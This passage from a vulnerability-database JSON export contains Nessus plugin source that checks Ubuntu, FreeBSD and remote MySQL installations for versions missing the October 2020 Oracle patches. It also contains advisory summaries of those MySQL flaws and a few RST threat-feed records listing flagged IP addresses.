script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|20\\.04|20\\.10)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04 / 20.04 / 20.10', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'libmysqlclient-dev', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'libmysqlclient20', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'libmysqld-dev', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-client', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-client-5.7', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-client-core-5.7', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-common', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-server', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-server-5.7', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-server-core-5.7', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-source-5.7', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-testsuite', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '16.04', 'pkgname': 'mysql-testsuite-5.7', 'pkgver': '5.7.32-0ubuntu0.16.04.1'},\n {'osver': '18.04', 'pkgname': 'libmysqlclient-dev', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'libmysqlclient20', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'libmysqld-dev', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-client', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-client-5.7', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-client-core-5.7', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-server', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-server-5.7', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-server-core-5.7', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-source-5.7', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-testsuite', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'mysql-testsuite-5.7', 'pkgver': '5.7.32-0ubuntu0.18.04.1'},\n {'osver': '20.04', 'pkgname': 'libmysqlclient-dev', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'libmysqlclient21', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-client', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-client-8.0', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-client-core-8.0', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-router', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-server', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-server-8.0', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-server-core-8.0', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-source-8.0', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-testsuite', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.04', 'pkgname': 'mysql-testsuite-8.0', 'pkgver': '8.0.22-0ubuntu0.20.04.2'},\n {'osver': '20.10', 'pkgname': 'libmysqlclient-dev', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'libmysqlclient21', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-client', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-client-8.0', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-client-core-8.0', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-router', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-server', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-server-8.0', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-server-core-8.0', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-source-8.0', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-testsuite', 'pkgver': '8.0.22-0ubuntu0.20.10.2'},\n {'osver': '20.10', 'pkgname': 'mysql-testsuite-8.0', 'pkgver': '8.0.22-0ubuntu0.20.10.2'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libmysqlclient-dev / libmysqlclient20 / libmysqlclient21 / etc');\n}", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-20T02:48:35", "description": "Oracle reports :\n\nThis Critical Patch Update contains 48 new security patches for Oracle\nMySQL.\n\nThe highest CVSS v3.1 Base Score of vulnerabilities affecting Oracle\nMySQL is 8.\n\nNOTE: MariaDB only contains CVE-2020-14812 CVE-2020-14765\nCVE-2020-14776 and CVE-2020-14789", "edition": 7, "cvss3": {"score": 8.0, "vector": "AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-22T00:00:00", "title": "FreeBSD : MySQL -- Multiple vulnerabilities (4fba07ca-13aa-11eb-b31e-d4c9ef517024)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14837", "CVE-2020-14765", "CVE-2020-14869", "CVE-2020-14777", "CVE-2020-14829", "CVE-2020-14771", "CVE-2020-14866", "CVE-2020-14769", "CVE-2020-14844", "CVE-2020-14800", "CVE-2020-14848", "CVE-2020-14812", "CVE-2020-14845", "CVE-2020-14809", "CVE-2020-14786", "CVE-2020-14760", "CVE-2020-14852", "CVE-2020-14791", "CVE-2020-14776", "CVE-2020-14773", "CVE-2020-14861", "CVE-2020-14821", "CVE-2020-14793", "CVE-2020-14891", "CVE-2020-14789", "CVE-2020-14804", "CVE-2020-14775", "CVE-2020-14828", "CVE-2020-14838", "CVE-2020-14830", "CVE-2020-14785", "CVE-2020-14868", "CVE-2020-14888", "CVE-2020-14794", "CVE-2020-14814", "CVE-2020-14893", "CVE-2020-14878", "CVE-2020-14839", "CVE-2020-14860", "CVE-2020-14873", "CVE-2020-14870", "CVE-2020-14836", "CVE-2020-14846", "CVE-2020-14827", "CVE-2020-14672", "CVE-2020-14790", "CVE-2020-14867", "CVE-2020-14799"], "modified": "2020-10-22T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:mysql56-server", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:mariadb103-server", "p-cpe:/a:freebsd:freebsd:mysql80-server", "p-cpe:/a:freebsd:freebsd:mariadb105-server", "p-cpe:/a:freebsd:freebsd:mariadb104-server", "p-cpe:/a:freebsd:freebsd:mysql57-server"], "id": "FREEBSD_PKG_4FBA07CA13AA11EBB31ED4C9EF517024.NASL", "href": "https://www.tenable.com/plugins/nessus/141793", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141793);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\"CVE-2020-14672\", \"CVE-2020-14760\", \"CVE-2020-14765\", \"CVE-2020-14769\", \"CVE-2020-14771\", \"CVE-2020-14773\", \"CVE-2020-14775\", \"CVE-2020-14776\", \"CVE-2020-14777\", \"CVE-2020-14785\", \"CVE-2020-14786\", \"CVE-2020-14789\", \"CVE-2020-14790\", \"CVE-2020-14791\", \"CVE-2020-14793\", \"CVE-2020-14794\", \"CVE-2020-14799\", \"CVE-2020-14800\", \"CVE-2020-14804\", \"CVE-2020-14809\", \"CVE-2020-14812\", \"CVE-2020-14814\", \"CVE-2020-14821\", \"CVE-2020-14827\", \"CVE-2020-14828\", \"CVE-2020-14829\", \"CVE-2020-14830\", \"CVE-2020-14836\", \"CVE-2020-14837\", \"CVE-2020-14838\", \"CVE-2020-14839\", \"CVE-2020-14844\", \"CVE-2020-14845\", \"CVE-2020-14846\", \"CVE-2020-14848\", \"CVE-2020-14852\", \"CVE-2020-14860\", \"CVE-2020-14861\", \"CVE-2020-14866\", \"CVE-2020-14867\", \"CVE-2020-14868\", \"CVE-2020-14869\", \"CVE-2020-14870\", \"CVE-2020-14873\", \"CVE-2020-14878\", \"CVE-2020-14888\", \"CVE-2020-14891\", \"CVE-2020-14893\");\n script_xref(name:\"IAVA\", value:\"2020-A-0473-S\");\n\n script_name(english:\"FreeBSD : MySQL -- Multiple vulnerabilities (4fba07ca-13aa-11eb-b31e-d4c9ef517024)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Oracle reports :\n\nThis Critical Patch Update contains 48 new security patches for Oracle\nMySQL.\n\nThe highest CVSS v3.1 Base Score of vulnerabilities affecting Oracle\nMySQL is 8.\n\nNOTE: MariaDB only contains CVE-2020-14812 CVE-2020-14765\nCVE-2020-14776 and CVE-2020-14789\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.oracle.com/security-alerts/cpuoct2020.html#AppendixMSQL\"\n );\n # https://vuxml.freebsd.org/freebsd/4fba07ca-13aa-11eb-b31e-d4c9ef517024.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?620f7075\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14878\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb103-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb104-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb105-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql57-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql80-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"mariadb103-server<10.3.26\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb104-server<10.4.16\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb105-server<10.5.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql56-server<5.6.50\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql57-server<5.7.32\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql80-server<8.0.22\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-20T04:11:26", "description": "The version of MySQL running on the remote host is 8.0.x prior to 8.0.22. It is, therefore, affected by multiple\nvulnerabilities, including the following, as noted in the October 2020 Critical Patch Update advisory:\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). \n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows \n low privileged attacker with access to the physical communication segment attached to the hardware \n where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability \n can result in takeover of MySQL Server (CVE-2020-14878).\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions\n that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker \n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this \n vulnerability can result in takeover of MySQL Server (CVE-2020-14828)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that\n are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low \n privileged attacker with network access via multiple protocols to compromise MySQL Server. \n Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or \n frequently repeatable crash (complete DOS) of MySQL Server (CVE-2020-14775). \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.", "edition": 5, "cvss3": {"score": 8.0, "vector": "AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-22T00:00:00", "title": "MySQL 8.0.x < 8.0.22 Multiple Vulnerabilities (Oct 2020 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14837", "CVE-2020-14765", "CVE-2020-14869", "CVE-2020-14777", "CVE-2020-14829", "CVE-2020-14771", "CVE-2020-14866", "CVE-2020-14769", "CVE-2020-14844", "CVE-2020-14800", "CVE-2020-14848", "CVE-2020-14812", "CVE-2020-14845", "CVE-2020-14809", "CVE-2021-2030", "CVE-2020-14786", "CVE-2020-14852", "CVE-2020-14791", "CVE-2020-14776", "CVE-2020-14773", "CVE-2020-14861", "CVE-2020-14821", "CVE-2020-14793", "CVE-2020-14891", "CVE-2020-14789", "CVE-2020-14804", "CVE-2020-14775", "CVE-2020-14828", "CVE-2020-14838", "CVE-2020-14830", "CVE-2021-2055", "CVE-2020-14785", "CVE-2020-14868", "CVE-2020-14888", "CVE-2020-14794", "CVE-2020-14814", "CVE-2020-14893", "CVE-2020-14878", "CVE-2020-14839", "CVE-2020-14860", "CVE-2021-2028", "CVE-2021-2042", "CVE-2020-14873", "CVE-2020-14870", "CVE-2020-14836", "CVE-2020-14846", "CVE-2020-14827", "CVE-2020-14672", "CVE-2020-14790", "CVE-2020-14867"], "modified": "2020-10-22T00:00:00", "cpe": ["cpe:/a:oracle:mysql"], "id": "MYSQL_8_0_22.NASL", "href": "https://www.tenable.com/plugins/nessus/141798", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141798);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\n \"CVE-2020-14672\",\n \"CVE-2020-14765\",\n \"CVE-2020-14769\",\n \"CVE-2020-14771\",\n \"CVE-2020-14773\",\n \"CVE-2020-14775\",\n \"CVE-2020-14776\",\n \"CVE-2020-14777\",\n \"CVE-2020-14785\",\n \"CVE-2020-14786\",\n \"CVE-2020-14789\",\n \"CVE-2020-14790\",\n \"CVE-2020-14791\",\n \"CVE-2020-14793\",\n \"CVE-2020-14794\",\n \"CVE-2020-14800\",\n \"CVE-2020-14804\",\n \"CVE-2020-14809\",\n \"CVE-2020-14812\",\n \"CVE-2020-14814\",\n \"CVE-2020-14821\",\n \"CVE-2020-14827\",\n \"CVE-2020-14828\",\n \"CVE-2020-14829\",\n \"CVE-2020-14830\",\n \"CVE-2020-14836\",\n \"CVE-2020-14837\",\n \"CVE-2020-14838\",\n \"CVE-2020-14839\",\n \"CVE-2020-14844\",\n \"CVE-2020-14845\",\n \"CVE-2020-14846\",\n \"CVE-2020-14848\",\n \"CVE-2020-14852\",\n \"CVE-2020-14860\",\n \"CVE-2020-14861\",\n \"CVE-2020-14866\",\n \"CVE-2020-14867\",\n \"CVE-2020-14868\",\n \"CVE-2020-14869\",\n \"CVE-2020-14870\",\n \"CVE-2020-14873\",\n \"CVE-2020-14878\",\n \"CVE-2020-14888\",\n \"CVE-2020-14891\",\n \"CVE-2020-14893\",\n \"CVE-2021-2028\",\n \"CVE-2021-2030\",\n \"CVE-2021-2042\",\n \"CVE-2021-2055\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0473-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0038\");\n\n script_name(english:\"MySQL 8.0.x < 8.0.22 Multiple Vulnerabilities (Oct 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL running on the remote host is 8.0.x prior to 8.0.22. It is, therefore, affected by multiple\nvulnerabilities, including the following, as noted in the October 2020 Critical Patch Update advisory:\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). \n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows \n low privileged attacker with access to the physical communication segment attached to the hardware \n where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability \n can result in takeover of MySQL Server (CVE-2020-14878).\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions\n that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker \n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this \n vulnerability can result in takeover of MySQL Server (CVE-2020-14828)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that\n are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low \n privileged attacker with network access via multiple protocols to compromise MySQL Server. \n Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or \n frequently repeatable crash (complete DOS) of MySQL Server (CVE-2020-14775). \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.oracle.com/security-alerts/cpuoct2020.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6a84ed85\");\n # https://www.oracle.com/security-alerts/cpujan2021.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f5cff95\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL version 8.0.22 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14878\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude('mysql_version.inc');\n\nmysql_check_version(min:'8.0.0', fixed:'8.0.22', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "rst": [{"lastseen": "2021-02-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **124[.]25.79.26** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **43**.\n First seen: 2021-02-16T03:00:00, Last seen: 2021-02-22T03:00:00.\n IOC tags: **shellprobe**.\nASN 2510: (First IP 124.24.0.0, Last IP 124.27.255.255).\nASN Name \"INFOWEB\" and Organisation \"FUJITSU LIMITED\".\nASN hosts 14804 domains.\nGEO IP information: City \"Kanagawa\", Country \"Japan\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-16T00:00:00", "id": "RST:5EF821C4-1E21-37A2-94DD-9912465E78A6", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. IOC: 124.25.79.26", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **58[.]1.243.2** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **39**.\n First seen: 2021-02-10T03:00:00, Last seen: 2021-02-17T03:00:00.\n IOC tags: **generic**.\nASN 2510: (First IP 58.0.0.0, Last IP 58.1.255.255).\nASN Name \"INFOWEB\" and Organisation \"FUJITSU LIMITED\".\nASN hosts 14804 domains.\nGEO IP information: City \"Taito\", Country \"Japan\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-10T00:00:00", "id": "RST:0F180F94-04BA-32F2-8BD6-5175A8898D28", "href": "", "published": "2021-02-18T00:00:00", "title": "RST Threat feed. IOC: 58.1.243.2", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-14T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **220[.]209.236.60** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-02-12T03:00:00, Last seen: 2021-02-14T03:00:00.\n IOC tags: **generic**.\nASN 2510: (First IP 220.209.0.0, Last IP 220.209.255.255).\nASN Name \"INFOWEB\" and Organisation \"FUJITSU LIMITED\".\nASN hosts 14804 domains.\nGEO IP information: City \"Aomori\", Country \"Japan\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-12T00:00:00", "id": "RST:7C31D560-FFF6-3CE4-A848-FA2388363F36", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: 220.209.236.60", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **218[.]226.91.201** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **28**.\n First seen: 2021-01-08T03:00:00, Last seen: 2021-02-06T03:00:00.\n IOC tags: **generic**.\nASN 2510: (First IP 218.226.0.0, Last IP 218.226.255.255).\nASN Name \"INFOWEB\" and Organisation \"FUJITSU LIMITED\".\nASN hosts 14804 domains.\nGEO IP information: City \"Osaka\", Country \"Japan\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-08T00:00:00", "id": "RST:CDEA4E05-7F69-3C7D-8DE9-826CCF5E79B4", "href": "", "published": "2021-02-07T00:00:00", "title": "RST Threat feed. IOC: 218.226.91.201", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **58[.]1.250.232** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-02-04T03:00:00, Last seen: 